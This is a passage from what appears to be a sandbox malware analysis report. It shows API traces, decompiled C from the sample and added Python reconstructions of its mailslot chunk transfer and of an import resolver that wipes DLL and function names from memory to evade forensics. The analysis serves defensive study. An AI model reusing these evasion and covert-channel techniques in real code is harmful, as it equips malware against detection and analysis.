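    """Known bit names, lowest bit first, plus any leftover bits as one hex item."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(bit for bit in table if value & bit)
    return names + ([f"0x{rest:x}"] if rest else [])

def decoded_arg(call: Call) -> Optional[Tuple[int, Dict[int, str]]]:
    spec = DECODE.get(call.api)
    if spec and len(call.args) > spec[0] and isinstance(call.args[spec[0]], int):
        return call.args[spec[0]], spec[1]
    return None

def annotate(call: Call) -> Optional[str]:
    """Decoded form of the interesting argument, or None if the API has none."""
    dec = decoded_arg(call)
    if dec is None:
        return None
    return f"{call.api} arg{DECODE[call.api][0]}=0x{dec[0]:08x} [{'|'.join(decode_flags(*dec))}]"

def hollowing_stages(calls: List[Call]) -> Dict[str, bool]:
    """Which process-hollowing stages occur anywhere in the trace; order is not checked."""
    seen = dict.fromkeys(("suspended_child", "section_swap", "exec_memory",
                          "remote_write", "context_change", "resume"), False)
    for c in calls:
        dec = decoded_arg(c)
        if c.api.startswith("CreateProcess") and dec and dec[0] & 0x4:   # CREATE_SUSPENDED
            seen["suspended_child"] = True
        elif dec and dec[1] is PAGE_PROTECT and dec[0] & 0xF0:          # any PAGE_EXECUTE* bit
            seen["exec_memory"] = True
        if c.api in STAGE_APIS:
            seen[STAGE_APIS[c.api]] = True
    return seen
```

Each decoded value supports a conclusion rather than proving it: the report prints stack slots as hex, so a short string argument such as the String ID D above is also valid hex, and the stage check only asks whether every stage appears somewhere, not in which order.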
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax; // heap handle from HeapCreate, kept in a global
				_v28 = _a4; // image base from GetModuleHandleA, shared with both worker threads
				 *0x4030e8 = 0x736c6e70; // executed; bytes 70 6E 6C 73 = "pnls", the String ID also seen in the 002E1000 entries above
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed: first worker
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed: second worker, the mailslot writer shown below
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed: INFINITE wait for the mailslot writer
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4); // writer failed: kill the first worker, keep the writer's error as the result
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed: both workers succeeded; E00401593 allocates with VirtualAlloc (see APIs below)
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4; // Win32 error code, 0 on success; becomes the ExitThread status in _entry_
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0; // bytes sent so far (offset into the buffer)
				do {
					// GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING: the mailslot must already exist
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) { // INVALID_HANDLE_VALUE
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64); // 100 ms
					}
				} while (_v12 == 2); // 2 = ERROR_FILE_NOT_FOUND: poll until the reader side has created the mailslot
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed: fills in the buffer pointer (_a4) and its size (_v24)
				if(_t34 == 0) {
					_v12 = 0xb; // 11 = ERROR_BAD_FORMAT
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4; // buffer
				_push(_t45);
				_t46 = _v24; // bytes remaining
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000; // one mailslot message per 4 KiB chunk
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed; _v16 receives the byte count written
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) { // 121 = ERROR_SEM_TIMEOUT: retry after the Sleep, anything else aborts
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							// payload ended on an exact 4 KiB boundary: resend the last byte as a
							// 1-byte message so that the transfer always ends with a short message
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8); // wipe the sent buffer before freeing it
				E00401207(_t52); // HeapFree (see APIs below)
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
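The WriteFile loop in E004010FB above defines a small framing protocol on the mailslot \\.\mailslot\msl0. The following Python is an added example, not code from the sample and not part of the Joe Sandbox report: it reproduces the sender's framing exactly as decompiled and adds an assumed receiver, since the reader thread is not on this page; a Python list stands in for the mailslot so the code runs offline.

```python
"""Chunked mailslot transfer as reconstructed from E004010FB.

Added example; not code from the sample and not part of the Joe Sandbox
report. The sender side is read off the decompiled loop above: messages of
at most 0x1000 bytes, and when the payload ends on an exact 0x1000 boundary
the last byte is sent again as a 1-byte message, so every transfer ends
with a short message. The receiver is an assumption written to match that
framing (the sample's reader thread is not on this page), and a Python list
stands in for \\\\.\\mailslot\\msl0 so the code runs offline.
"""
from typing import Iterable, List, Optional

CHUNK = 0x1000  # the 0x1000 bound in the decompiled WriteFile loop


def frame_payload(data: bytes) -> List[bytes]:
    """Return the mailslot messages the sender emits for `data`, in order."""
    messages: List[bytes] = []
    offset = 0              # _v8: bytes already written
    remaining = len(data)   # _t46: bytes still to write
    while True:             # do { ... } while (_t46 != 0)
        n = min(remaining, CHUNK)                   # _v16
        messages.append(data[offset:offset + n])    # WriteFile(hSlot, buf + offset, n)
        offset += n
        remaining -= n
        if remaining == 0 and n == CHUNK:
            # Last write was a full chunk: step back one byte and send it
            # again, so a short (< 0x1000) message terminates every transfer.
            remaining = 1
            offset -= 1
        if remaining == 0:
            break
    return messages


def reassemble(messages: Iterable[bytes], expected_len: Optional[int] = None) -> bytes:
    """Assumed receiver: append messages until the first short one.

    On the wire the resent byte cannot be told apart from a genuine 1-byte
    tail (a 0x1000-byte and a 0x1001-byte payload with the same last byte
    produce identical message sequences), so the true length must come from
    somewhere else, for example a header inside the payload; pass it as
    expected_len and the duplicate is dropped.
    """
    out = bytearray()
    for msg in messages:
        out += msg
        if len(msg) < CHUNK:
            break
    if expected_len is not None:
        del out[expected_len:]
    return bytes(out)
```

On Windows the sender additionally polls CreateFileA every 100 ms while it gets ERROR_FILE_NOT_FOUND (2) and retries WriteFile on ERROR_SEM_TIMEOUT (121), as the decompiled loop shows; neither retry is modelled here. The length ambiguity is the point a reader for this channel has to handle: the real size has to be known from the payload itself (presumably from whatever E0040171F builds, which is an assumption).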
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi; // image base
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000; // return value, 0 = success
				_t33 =  *((intOrPtr*)(_a4 + 0x80)); // IMAGE_NT_HEADERS32 + 0x80 = DataDirectory[IMPORT].VirtualAddress
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi; // first IMAGE_IMPORT_DESCRIPTOR
				_t23 =  *((intOrPtr*)(_t34 + 0xc)); // descriptor->Name (RVA of the DLL name)
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44)); // wipe the DLL name from the image once the module is loaded
					_t27 =  *_t34; // descriptor->OriginalFirstThunk (import lookup table)
					_t35 =  *((intOrPtr*)(_t34 + 0x10)); // descriptor->FirstThunk (the IAT)
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42; // current lookup-table entry
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20)); // Name of the next descriptor (0x14 + 0xc)
							_t34 = _t34 + 0x14; // sizeof(IMAGE_IMPORT_DESCRIPTOR)
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42; // distance from a lookup-table entry to its IAT slot
						_t57 = _t28;
						L8:
						if(_t57 < 0) { // IMAGE_ORDINAL_FLAG32 set: no ordinal lookup, the value is kept only if it already points inside the image
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) { // +0x50 = OptionalHeader.SizeOfImage
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42; // RVA of the IMAGE_IMPORT_BY_NAME entry
						}
						_t11 = _t28 + 2; // skip the 2-byte Hint, leaving the function name
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49)); // wipe the function name as well
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4; // store the resolved address in the IAT slot
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f; // 127 = ERROR_PROC_NOT_FOUND, remembered while the remaining DLLs are still processed
						goto L19;
					}
					_t27 = _t35; // no lookup table: walk the IAT itself
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e; // 126 = ERROR_MOD_NOT_FOUND
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
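The routine above is a hand-rolled import resolver: edi carries an image base and _a4 points at IMAGE_NT_HEADERS32, so _a4 + 0x80 is the import directory RVA, _a4 + 0x50 is SizeOfImage, the 0x14-byte stride is sizeof(IMAGE_IMPORT_DESCRIPTOR) (Name at +0xC, FirstThunk at +0x10), and the +2 skips the Hint word of IMAGE_IMPORT_BY_NAME. It returns Win32 codes 0x7E (ERROR_MOD_NOT_FOUND, abort at the first DLL LoadLibraryA cannot load) and 0x7F (ERROR_PROC_NOT_FOUND, remembered while the loop moves on to the next DLL), and it memset()s every DLL and function name to zero right after use, so a later memory dump shows a populated IAT with no import strings. The Python below is an added model of that logic, not code from the sample or the report: it runs over a constructed flat image (offset == RVA) with a stand-in export table instead of LoadLibraryA/GetProcAddress, and it reads the `_t57 < 0` branch as the usual IMAGE_ORDINAL_FLAG32 test, which is an assumption about the decompiler output rather than something the listing states.

```python
import struct

# Offsets used by the decompiled routine (relative to IMAGE_NT_HEADERS32 / IMAGE_IMPORT_DESCRIPTOR).
IMPORT_DIR_RVA_OFF = 0x80   # OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress
SIZE_OF_IMAGE_OFF = 0x50    # OptionalHeader.SizeOfImage
DESC_SIZE = 0x14            # sizeof(IMAGE_IMPORT_DESCRIPTOR); Name at +0xC, FirstThunk at +0x10
ORDINAL_FLAG = 0x80000000   # IMAGE_ORDINAL_FLAG32 (assumed reading of the "_t57 < 0" branch)

ERROR_MOD_NOT_FOUND = 0x7E   # returned when LoadLibraryA fails
ERROR_PROC_NOT_FOUND = 0x7F  # recorded when GetProcAddress fails


def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def _cstr(buf, off):
    return bytes(buf[off:buf.index(b"\x00", off)])


def _wipe(buf, off):
    """memset(name, 0, lstrlenA(name)): the sample erases each string right after using it."""
    end = buf.index(b"\x00", off)
    buf[off:end] = bytes(end - off)


def resolve_imports(image, nt_off, exports):
    """Model of E00401389 over a flat bytearray image (offset == RVA, playing the role of edi).

    exports stands in for LoadLibraryA/GetProcAddress:
    {dll_name_lowercase: {func_name_or_ordinal: address}}.
    """
    import_rva = _u32(image, nt_off + IMPORT_DIR_RVA_OFF)
    if import_rva == 0:
        return 0
    status = 0
    desc = import_rva
    while True:
        name_rva = _u32(image, desc + 0xC)
        if name_rva == 0:                      # terminating descriptor
            return status
        module = exports.get(_cstr(image, name_rva).decode("ascii").lower())
        if module is None:
            return ERROR_MOD_NOT_FOUND         # sample stops at the first DLL it cannot load
        _wipe(image, name_rva)
        oft = _u32(image, desc)                # OriginalFirstThunk (lookup table)
        ft = _u32(image, desc + 0x10)          # FirstThunk (the IAT being filled)
        lookup = oft or ft                     # sample falls back to the IAT when OFT is zero
        iat_delta = ft - lookup
        while lookup:
            thunk = _u32(image, lookup)
            if thunk == 0:
                break
            by_ordinal = bool(thunk & ORDINAL_FLAG)
            key = (thunk & 0xFFFF) if by_ordinal else _cstr(image, thunk + 2).decode("ascii")
            addr = module.get(key)
            if addr is None:
                status = ERROR_PROC_NOT_FOUND  # sticky, but processing continues with the next DLL
                break
            if not by_ordinal:
                _wipe(image, thunk + 2)        # the imported function name is erased as well
            struct.pack_into("<I", image, lookup + iat_delta, addr)
            lookup += 4
        desc += DESC_SIZE


def build_image(imports, nt_off=0x100, data_off=0x200):
    """Constructed test image (not taken from the sample) carrying a PE-style import table."""
    image = bytearray(0x1000)
    struct.pack_into("<I", image, nt_off + IMPORT_DIR_RVA_OFF, data_off)
    struct.pack_into("<I", image, nt_off + SIZE_OF_IMAGE_OFF, len(image))
    cursor = data_off + DESC_SIZE * (len(imports) + 1)       # strings/thunks follow the descriptors
    iats = {}
    for i, (dll, funcs) in enumerate(imports):
        name_rva = cursor
        image[cursor:cursor + len(dll)] = dll.encode("ascii")
        cursor += len(dll) + 1
        entries = []
        for f in funcs:
            if isinstance(f, int):
                entries.append(ORDINAL_FLAG | f)
            else:                                              # IMAGE_IMPORT_BY_NAME: WORD Hint, CHAR Name[]
                cursor = (cursor + 1) & ~1
                entries.append(cursor)
                image[cursor + 2:cursor + 2 + len(f)] = f.encode("ascii")
                cursor += 2 + len(f) + 1
        cursor = (cursor + 3) & ~3
        oft, ft = cursor, cursor + 4 * (len(funcs) + 1)
        for j, v in enumerate(entries):
            struct.pack_into("<I", image, oft + 4 * j, v)
            struct.pack_into("<I", image, ft + 4 * j, v)       # unbound IAT mirrors the lookup table
        cursor = ft + 4 * (len(funcs) + 1)
        struct.pack_into("<IIIII", image, data_off + i * DESC_SIZE, oft, 0, 0, name_rva, ft)
        iats[dll] = ft
    return image, nt_off, iats


def iat_entries(image, rva, count):
    return list(struct.unpack_from("<%dI" % count, image, rva))


# Constructed stand-in for the loaded DLLs' export tables; the addresses are arbitrary.
FAKE_EXPORTS = {
    "kernel32.dll": {"LoadLibraryA": 0x7C801D7B, "GetProcAddress": 0x7C80AE40, 17: 0x7C8011AA},
    "user32.dll": {"FindWindowA": 0x7E42F1D2},
}
SAMPLE_IMPORTS = [("KERNEL32.dll", ["LoadLibraryA", 17, "GetProcAddress"]), ("USER32.DLL", ["FindWindowA"])]


def demo(exports=FAKE_EXPORTS):
    image, nt_off, iats = build_image(SAMPLE_IMPORTS)
    return resolve_imports(image, nt_off, exports), image, iats
```

After demo() the IATs hold the stand-in addresses and neither "KERNEL32.dll" nor any function name is left in the image, which is the artefact to expect when carving this stage out of memory: rebuild imports from the IAT addresses rather than from strings.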
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
